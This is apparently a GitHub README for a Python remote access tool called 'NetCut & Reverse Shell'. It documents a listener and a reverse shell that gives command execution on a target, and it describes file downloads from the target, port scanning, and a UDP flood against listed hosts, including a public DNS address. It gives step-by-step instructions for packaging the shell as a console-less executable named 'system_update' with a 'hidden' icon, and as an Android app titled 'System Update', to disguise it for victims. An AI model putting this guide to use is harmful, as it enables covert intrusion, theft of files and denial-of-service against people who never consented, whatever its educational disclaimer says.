╔═══════════════════════════════════════════════════════════════════╗
║ ███╗ ██╗███████╗████████╗ ██████╗██╗ ██╗████████╗ ║
║ ████╗ ██║██╔════╝╚══██╔══╝██╔════╝██║ ██║╚══██╔══╝ ║
║ ██╔██╗ ██║█████╗ ██║ ██║ ██║ ██║ ██║ ║
║ ██║╚██╗██║██╔══╝ ██║ ██║ ██║ ██║ ██║ ║
║ ██║ ╚████║███████╗ ██║ ╚██████╗╚██████╔╝ ██║ ║
║ ╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ║
║ ║
║ & REVERSE SHELL ║
║ Cross-Platform Remote Access Tool for Python ║
╚═══════════════════════════════════════════════════════════════════╝
|
EDUCATIONAL USE ONLY This tool is strictly for educational purposes, authorized testing, and security research. Unauthorized access to computer systems is illegal. Users must comply with all applicable laws. The author assumes NO liability for misuse or damages. |
NetCut & Reverse Shell is a Python-based remote access tool that allows controlling another computer or phone through a reverse shell connection. It consists of two main components:
- NetCat Listener (
netcat.py): Runs on the attacker's machine to listen for incoming connections, and also provides additional utilities like port scanning, UDP flood, file download, and HTTP server. - Reverse Shell (
reverce_shell.py): Runs on the target machine to establish a connection back to the listener.
This tool enables remote command execution, file transfer, HTTP server deployment, and more across Windows, Linux, and Android platforms.
graph LR
A[Attacker Machine] -->|Runs NetCat Listener| B[netcat.py]
C[Target Machine] -->|Runs Reverse Shell| D[reverce_shell.py]
B <-->|Reverse Connection| D
style A fill:#FF4D4D,stroke:#fff,stroke-width:2px,color:#fff
style C fill:#FF8C8C,stroke:#fff,stroke-width:2px,color:#fff
style B fill:#FF6B6B,stroke:#fff,color:#fff
style D fill:#FFA7A7,stroke:#fff,color:#fff
| Module | Description |
|---|---|
| Reverse Shell | Establish remote shell access to target machine |
| NetCat Listener | Listen for incoming reverse connections |
| File Download | Download files from target to local machine |
| HTTP Server | Run HTTP server on target for browser access |
| Local Execution | Execute commands on local machine remotely |
| Target IP | Display target machine IP address |
| Output Saving | Save command outputs to file |
| UDP Flood | Simulate UDP flood attacks (educational) |
| Port Scanner | Scan open ports on a remote host |
| URL Downloader | Download files directly from a URL |
| Cross-Platform | Works on Windows, Linux, Android |
| File Conversion | Convert to .exe or .apk for deployment |
| Built-in Help | Comprehensive command help system |
┌─────────────────────────────────────────────────────────────────┐
│ CONNECTION ARCHITECTURE │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────────┐ ┌──────────────────┐ │
│ │ ATTACKER │ │ TARGET │ │
│ │ MACHINE │ │ MACHINE │ │
│ │ │ │ │ │
│ │ ┌────────────┐ │ Reverse Shell │ ┌────────────┐ │ │
│ │ │ netcat.py │ │◄────────────────────►│ │reverce_ │ │ │
│ │ │ (Listener) │ │ Connection │ │shell.py │ │ │
│ │ └────────────┘ │ │ └────────────┘ │ │
│ │ ▲ │ │ ▲ │ │
│ │ │ │ │ │ │ │
│ │ ┌─────┴─────┐ │ │ ┌─────┴─────┐ │ │
│ │ │ Commands │ │ │ │ Commands │ │ │
│ │ │ Interface │ │ │ │ Execution │ │ │
│ │ └───────────┘ │ │ └───────────┘ │ │
│ │ │ │ │ │ │
│ │ │ │ ┌─────▼─────┐ │ │
│ │ │ │ │ HTTP │ │ │
│ │ │ │ │ Server │ │ │
│ │ │ │ └───────────┘ │ │
│ └──────────────────┘ └──────────────────┘ │
│ │
│ ┌──────────────────────────────────────────┐ │
│ │ FILE TRANSFER PROTOCOL │ │
│ │ Download files from target → attacker │ │
│ └──────────────────────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────┘
1. Attacker starts netcat.py (listener)
2. Target executes reverce_shell.py
3. Target connects back to attacker
4. Attacker sends commands through netcat.py
5. Target executes commands and returns output
6. Files can be downloaded from target
7. HTTP server can be started on target for browser access
# Clone the repository
git clone https://github.com/omer-devil/netcut-and-reverce_shell.git
# Move to project directory
cd netcut-and-reverce_shell
# Install required dependencies
pip3 install -r requirements.txt# No external dependencies required
# Uses only Python standard library
python3 netcat.pyThe listener will start and wait for incoming connections:
[+] NetCat Listener Started on port 4444
[+] Waiting for incoming connections...
python3 reverce_shell.pyThe target will connect back to the attacker:
[+] Connecting to attacker...
[+] Connection established!
[+] Ready to receive commands
Once connected, you'll have shell access to the target machine:
reverse_shell>
You can now execute commands on the target machine.
The netcat.py script includes several standalone utilities that can be used without starting the listener. Below is a complete reference of all available command-line arguments.
| Argument | Description | Example |
|---|---|---|
-h, --help, help |
Display help message | python netcat.py -h |
-d, --download |
Download a file from a URL | python netcat.py -d https://example.com/file.pdf |
-s, --port-scan |
Scan open ports on a target host | python netcat.py -s 192.168.1.1 |
--udp-flood |
Launch UDP flood attack (multiple targets separated by commas) | python netcat.py --udp-flood 192.168.1.100,192.168.1.101 |
-l, --listen |
Start listener on specified port (reverse shell mode) | python netcat.py -l 55555 |
-ss, --server |
Start HTTP server to serve a directory | python netcat.py -ss ./shared_folder |
python netcat.py -h
# or
python netcat.py --help
# or
python netcat.py helpDisplays the help menu with all available options.
python netcat.py --download https://example.com/sample.pdf
# or
python netcat.py -d https://example.com/sample.pdfDownloads the file from the specified URL and saves it locally.
python netcat.py --port-scan 192.168.1.1
# or
python netcat.py -s 192.168.1.1Scans common ports on the target host and reports open ones.
# Single target
python netcat.py --udp-flood 192.168.1.100
# Multiple targets (comma-separated, no spaces)
python netcat.py --udp-flood 192.168.1.100,192.168.1.101,8.8.8.8Launches a UDP flood attack against the specified target(s). During the attack, you can use interactive commands:
list– show all active targetskill <target>– add a new target to the attackexit/q/quit– stop the attack
python netcat.py --listen 55555
# or
python netcat.py -l 55555Starts the NetCat listener on the specified port. This is the primary mode for accepting reverse shell connections from reverce_shell.py.
python netcat.py --server ./my_folder
# or
python netcat.py -ss ./my_folderStarts an HTTP server on port 8000 (default) to serve files from the specified directory. Useful for transferring files to the target machine.
Once the reverse shell is established, the following commands are available on the attacker's side.
| Command | Description | Example |
|---|---|---|
l-host |
Execute command on local host | l-host ls |
download |
Download file from target | download video.mp4 |
server |
Start HTTP server on target | server 127.0.0.1:468 |
target-ip |
Show target IP address | target-ip |
output_save |
Enable/disable output saving | output_save True |
help |
Show this help message | help |
Execute commands on your local machine (attacker) without sending to target.
Syntax:
l-host <command>
Examples:
reverse_shell> l-host pwd
/home/attacker/Desktop
reverse_shell> l-host ls -la
total 24
drwxr-xr-x 2 user user 4096 Jan 28 14:32 .
drwxr-xr-x 10 user user 4096 Jan 28 14:30 ..
-rw-r--r-- 1 user user 123 Jan 28 14:32 netcat.py
reverse_shell> l-host ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
IPv4 Address: 192.168.1.100Use Cases:
- Check local files while connected to target
- Run local tools without disconnecting
- Compare local and remote environments
Download files from the target machine to your local machine.
Syntax:
download <filename>
Examples:
reverse_shell> download video.mp4
[+] Downloading video.mp4...
[+] File size: 15.2 MB
[+] Download complete: video.mp4 saved to ./downloads/
reverse_shell> download music.mp3
[+] Downloading music.mp3...
[+] File size: 3.4 MB
[+] Download complete: music.mp3 saved to ./downloads/
reverse_shell> download report.pdf
[+] Downloading report.pdf...
[+] File size: 245 KB
[+] Download complete: report.pdf saved to ./downloads/Supported File Types:
- Videos (.mp4, .avi, .mkv)
- Music (.mp3, .wav, .flac)
- Documents (.pdf, .docx, .txt)
- Images (.jpg, .png, .gif)
- Archives (.zip, .rar, .tar)
- Apps (.apk, .exe, .deb)
Notes:
- Files are saved to a
downloadsfolder in the current directory - Large files may take time depending on connection speed
- Progress indicator shows download status
Start an HTTP server on the target machine to access files through a browser.
Syntax:
server <IP:PORT>
Examples:
reverse_shell> server 127.0.0.1:55555
[+] HTTP Server started on 127.0.0.1:55555
[+] Serving files from current directory
[+] Access at: http://127.0.0.1:55555
reverse_shell> server 0.0.0.0:8080
[+] HTTP Server started on 0.0.0.0:8080
[+] Serving files from current directory
[+] Access at: http://<target-ip>:8080Browser Access:
http://127.0.0.1:55555
─────────────────────────────────
Directory listing:
Documents/
Downloads/
config.json
data.txt
Pictures/
Important Notes:
- Only recommended on the same network
- Use
0.0.0.0to bind to all interfaces - Access via browser using target's IP address
- Server runs in background thread
- Press Ctrl+C to stop the server
Display the IP address of the target machine.
Syntax:
target-ip [help]
Examples:
reverse_shell> target-ip
[+] Target IP Address: 192.168.1.105
reverse_shell> target-ip help
[+] target-ip: Shows the target machine's IP address
[+] Usage: target-ip
[+] Optional: target-ip help (shows this message)Use Cases:
- Verify target connection
- Use IP for HTTP server access
- Network troubleshooting
Enable or disable saving command outputs to a file.
Syntax:
output_save <True|False>
Examples:
# Start saving output
reverse_shell> output_save True
[+] Output saving enabled
[+] Output will be saved to: command_output.txt
# Stop saving output
reverse_shell> output_save False
[+] Output saving disabled
# Custom filename (modify in code)
# You can change the default filename in reverce_shell.pyOutput File Format:
=== Command Output: 2024-01-28 14:32:15 ===
Command: ls -la
Output:
total 24
drwxr-xr-x 2 user user 4096 Jan 28 14:32 .
drwxr-xr-x 3 user user 4096 Jan 28 14:30 ..
-rw-r--r-- 1 user user 123 Jan 28 14:32 file.txt
=== End of Output ===
Use Cases:
- Log all commands for later review
- Save command results for reporting
- Debug and troubleshooting
- Session recording
Display the complete help message with all available commands.
Syntax:
help
Example Output:
╔═══════════════════════════════════════════════════════════════╗
║ NETCUT & REVERSE SHELL ║
║ HELP MENU ║
╠═══════════════════════════════════════════════════════════════╣
║ ║
║ l-host <command> : Execute command on local host ║
║ Example: l-host ls ║
║ ║
║ download <file> : Download file from target ║
║ Example: download video.mp4 ║
║ ║
║ server <IP:PORT> : Start HTTP server on target ║
║ Example: server 127.0.0.1:55555 ║
║ Note: Only recommended on same network ║
║ ║
║ target-ip : Show target IP address ║
║ Example: target-ip ║
║ ║
║ output_save <T/F> : Enable/disable output saving ║
║ Example: output_save True ║
║ ║
║ help : Show this help message ║
║ ║
╚═══════════════════════════════════════════════════════════════╝
Using PyInstaller to create a standalone executable:
# Install pyinstaller
pip install pyinstaller
# Convert reverce_shell.py to exe (single file)
pyinstaller --onefile --noconsole reverce_shell.py
# Convert with custom icon
pyinstaller --onefile --noconsole --icon=icon.ico reverce_shell.py
# Output location
cd dist/
# reverce_shell.exe is readyPyInstaller Options:
| Option | Description |
|---|---|
--onefile |
Create single executable file |
--noconsole |
Hide console window (background) |
--icon |
Add custom icon to executable |
--name |
Rename output file |
--add-data |
Include additional files |
Example with all options:
pyinstaller --onefile --noconsole --icon=hidden.ico --name=system_update reverce_shell.pyUsing Buildozer to create Android package:
# Install buildozer
pip install buildozer
# Initialize buildozer
buildozer init
# Edit buildozer.spec file
nano buildozer.specRequired buildozer.spec configurations:
[app]
title = System Update
package.name = systemupdate
package.domain = org.example
source.dir = .
source.include_exts = py,png,jpg,kv,atlas
version = 0.1
requirements = python3
orientation = portrait
osx.python_version = 3
osx.kivy_version = 2.1.0
fullscreen = 0
[buildozer]
log_level = 2
warn_on_root = 1Build the APK:
# Build debug APK
buildozer android debug
# Build release APK
buildozer android release
# Deploy to connected device
buildozer android deploy run
# Output location
bin/
└── systemupdate-0.1-debug.apkAlternative: Use Python-for-Android
# Clone python-for-android
git clone https://github.com/kivy/python-for-android.git
cd python-for-android
# Build APK
python setup.py apk --name "SystemUpdate" --package org.example.systemupdate --version 0.1 --private /path/to/reverce_shell.py| Platform | Tool | Command | Output |
|---|---|---|---|
| Windows | PyInstaller | pyinstaller --onefile reverce_shell.py |
.exe |
| Linux | PyInstaller | pyinstaller --onefile reverce_shell.py |
Binary |
| Android | Buildozer | buildozer android debug |
.apk |
| macOS | PyInstaller | pyinstaller --onefile reverce_shell.py |
.app |
This tool is capable of:
- Remote shell access to target systems
- File transfer and download
- HTTP server deployment
- Local and remote command execution
- UDP flood simulation (educational)
- Port scanning
- Cross-platform operation (Windows, Linux, Android)
- Penetration testing with written authorization
- Security research in isolated labs
- Educational demonstrations
- Personal learning about reverse shells
- Testing your own systems
- Unauthorized access to any system
- Criminal or malicious activities
- Production systems without permission
- Violation of computer fraud laws
- Any use causing harm or damage
Users must comply with:
- Local, state, and federal laws
- Computer Fraud and Abuse Act (CFAA) in the US
- Similar laws in other jurisdictions
- Organizational policies and authorizations
BY USING THIS SOFTWARE, YOU AGREE TO:
- Use it only for educational purposes
- Test only on systems you own or have permission to test
- Accept full responsibility for your actions
- Not use it for any illegal activity
Contributions that improve the tool or add educational value are welcome.
- Fork the repository
- Create a feature branch (
git checkout -b feature/NewFeature) - Commit your changes (
git commit -m 'Add NewFeature') - Push to the branch (
git push origin feature/NewFeature) - Open a Pull Request
- Bug fixes
- Enhanced security features
- Additional platform support
- Documentation improvements
- Better output formatting
- Performance optimizations
For major changes, please open an issue first to discuss your ideas.
Educational Use Only
Copyright © 2023 Omer Kemal
This software is provided solely for educational purposes. No license, express or implied, is granted for any unauthorized or commercial use.
- Educational use in academic settings
- Personal learning and development
- Authorized security testing
- Security research in lab environments
- No commercial use without explicit permission
- No redistribution for malicious purposes
- No unauthorized deployment
- No modification for illegal activities
Disclaimer: This software comes with ABSOLUTELY NO WARRANTY. The author is not responsible for any misuse or damages resulting from the use of this software.
Omer Kemal
Security Researcher & Developer
| Project | Link |
|---|---|
| Repository | netcut-and-reverce_shell |
| Purpose | Security Education & Research |
For questions, feedback, or responsible disclosure, please open an issue on GitHub.
© 2023 NetCut & Reverse Shell. For Authorized Educational Use Only.